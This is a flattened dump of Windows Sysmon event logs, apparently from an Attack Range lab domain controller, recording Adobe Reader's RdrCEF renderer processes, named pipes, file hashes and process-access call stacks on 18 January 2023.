DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.126{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018740Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:20.979{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17649CA8A780F39D0EC612D7BF2E7065,SHA256=4C0CAF1D228D7733F6DE39BF7B57DD13A50F4727AE92562F94C719D5425E0372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.969{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B937090DDBB5ECF095F8EC6400F44314,SHA256=91409143D7A619412C042EA4CCCBAE5C4BDACB61F0AB278B8D4E5C97C78304CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.785{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0MD5=6BFB4550BB9F2A2CAEC157C9EC27D513,SHA256=24C4367C7CC2E8F96A0C9D29CB602E48179E3CE42B90E1346D986E927620B4FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.717{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0MD5=13A02B916BC277F1F08D24151C551976,SHA256=36607FD2EEF19F768061E5607F73C89FD5DD233EC51FB8A902D429A4315008C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.717{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0MD5=3C76FCCFA1D00A7F359BDBCAC23611ED,SHA256=32A38B1F1122DAFCA00C403A47A2CE1F5662C80D4C6D0D2630493462184936D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.717{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0MD5=7B4723298C5447775C1CF00EFE3BCAAC,SHA256=3933CDBBC007526EE0504AD6E0B5E5D6055F5147D3DA7638A8D544EDDBC9D730,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.714{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0MD5=C7C191E54749A54C0A678CEBDE85484F,SHA256=3B89969835743DF0C24BD36C05F211830B3B6F35BD767CD89D42E6399FBE7D82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 18141800x800000000000000047372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:20.682{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16363836300674367839C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:20.682{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16363836300674367839C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:20.674{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11155877371610006865C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:20.674{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11155877371610006865C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:20.674{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6558837758035376001C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:20.674{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6558837758035376001C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.672{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.672{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.672{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.663{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.663{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:20.586{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11146319757725047490C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:20.586{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11146319757725047490C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.584{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.584{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.584{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.584{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.582{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.582{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000047353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.582{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --launch-time-ticks=3180000961 --mojo-platform-channel-handle=3376 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000047352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.581{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 